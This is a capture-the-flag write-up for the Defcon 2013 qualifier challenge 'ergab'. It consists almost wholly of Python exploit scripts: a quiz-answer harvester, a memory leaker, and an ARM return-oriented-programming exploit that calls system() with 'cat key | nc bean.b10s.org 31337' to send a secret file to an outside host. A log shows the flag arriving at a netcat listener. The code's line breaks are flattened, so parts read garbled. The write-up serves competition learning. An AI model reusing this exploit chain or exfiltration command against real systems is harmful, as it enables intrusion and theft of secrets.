Defcon CTF 2013 Qual - pwnable3 (Exploit only)

Category : Pwnables

ergab

Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass

gen_answer_dict.py

import re

from socket import * from struct import pack, unpack HOST = "lolergab.shallweplayaga.me" PORT = 5000 def SaveFile(data): f = open('dic.txt', 'r') if f.read().find(data) != -1: f.close() return f.close() f = open('dic.txt', 'at') f.write(data) f.close() def Attack(s): data = s.recv(1024) l = data.split('\n') quest = l[0] data = re.search('1\) (.*)', l[1]) choice = data.group(1) s.send("1\n") if s.recv(1024).find('Wrong!!') == -1: SaveFile(quest + ":" + choice + "\n") print 'OK' return 0 def main(): s = socket(AF_INET , SOCK_STREAM) s.connect((HOST , PORT)) Attack(s) s.close() if __name__ == '__main__': while True: main()

leak_memory.py

import re

from socket import * from struct import pack, unpack import time, sys p = lambda x: pack("<L", x) HOST = "lolergab.shallweplayaga.me" #HOST = "192.168.0.171" PORT = 5000 senddata = 0x3C9C payload = "" payload += "a"*0x0f+"\n" def GetDatabase(): dic = {} f = open('dic.txt', 'r') for line in f: line = line.strip('\n') (quest, answer) = line.split(':') #print dic, " ", quest, " ", answer dic[quest] = answer f.close() return dic def Attack(s): dic = GetDatabase() for _ in range(5): data = s.recv(1024) l = data.split('\n') quest = l[0] answer = dic[quest] choice = 0 for i in range(1, 4+1): if l[i].find(answer) != -1: choice = i break s.send(str(choice) + '\n') s.recv(1024) print s.recv(1024) time.sleep(1)         raw_input(">") s.send(payload) time.sleep(1) print s.recv(1024) return 0 def main(): s = socket(AF_INET , SOCK_STREAM) s.connect((HOST , PORT)) Attack(s) s.close() if __name__ == '__main__': main()

Exploit

import re from socket import * from struct import pack, unpack import time, sys p = lambda x: pack("<L", x) HOST = "lolergab.shallweplayaga.me" PORT = 5000 base = 0xb6f54000 # server ##base = 0xb6faf000 # local system = 0xb6cbbbd8  # server ##system = 0xb6d19bd8 # local sleep = 0xb6d1af30 # server freespace = 0x0000d558 senddata = 0x3C9C recvdata = 0x3DC4 command = "cat key | nc bean.b10s.org 31337\x00" """ .text:000045FC 07 00 A0 E1                             MOV     R0, R7 .text:00004600 08 10 A0 E1                             MOV     R1, R8 .text:00004604 0A 20 A0 E1                             MOV     R2, R10 .text:00004608 01 40 84 E2                             ADD     R4, R4, #1 .text:0000460C 33 FF 2F E1                             BLX     R3 .text:00004610 06 00 54 E1                             CMP     R4, R6 .text:00004614 F7 FF FF 1A                             BNE     loc_45F8 .text:00004618 F8 85 BD E8                             LDMFD   SP!, {R3-R8,R10,PC} """ payload = "" payload += "a"*0x10 payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC} ############################# payload += p(base+0x00004624) # .text:00004624                 BX      LR payload += p(0x00000000) * 2 payload += p(0x00000001) payload += p(0x00000004) # r0 payload += p(base+freespace) # r1 payload += p(len(command)) # r2 ############################ payload += p(base+0x000045FC) ############################ payload += p(0x000000de) payload += p(0x11111111)*6 ############################ #payload += p(sleep) payload += p(base+recvdata) ########################### payload += p(0x11111111)*7 ########################## payload += p(base+0x00004618) # .text:00004618                 LDMFD   SP!, {R3-R8,R10,PC} ########################### payload += p(base+0x00004624) # .text:00004624                 BX      LR payload += p(0x00000000)*2 payload += p(0x00000001) payload += p(base+freespace) payload += p(0x00000001)*2 ########################### payload += p(base+0x000045FC) ########################## payload += p(0x11111111)*7 ########################## payload += p(system) ########################## payload += "\n" def GetDatabase(): dic = {} f = open('dic.txt', 'r') for line in f: line = line.strip('\n') (quest, answer) = line.split(':') #print dic, " ", quest, " ", answer dic[quest] = answer f.close() return dic def Attack(s): dic = GetDatabase() for _ in range(5): data = s.recv(1024) l = data.split('\n') quest = l[0] answer = dic[quest] choice = 0 for i in range(1, 4+1): if l[i].find(answer) != -1: choice = i break s.send(str(choice) + '\n') s.recv(1024) print s.recv(1024) time.sleep(1) s.send(payload) s.send(command) time.sleep(1) print s.recv(1024) def main(): s = socket(AF_INET , SOCK_STREAM) s.connect((HOST , PORT)) Attack(s) s.close() if __name__ == '__main__': main()

root@ubuntu:~# ./exploit.py -------------------------------------------------------------------- root@ubuntu:~# nc -lv 31337 Connection from 131.247.27.200 port 80 [tcp/http] accepted The key is: Hang on, I know what I need. Fish fingers. And custard.

Co written with StolenByte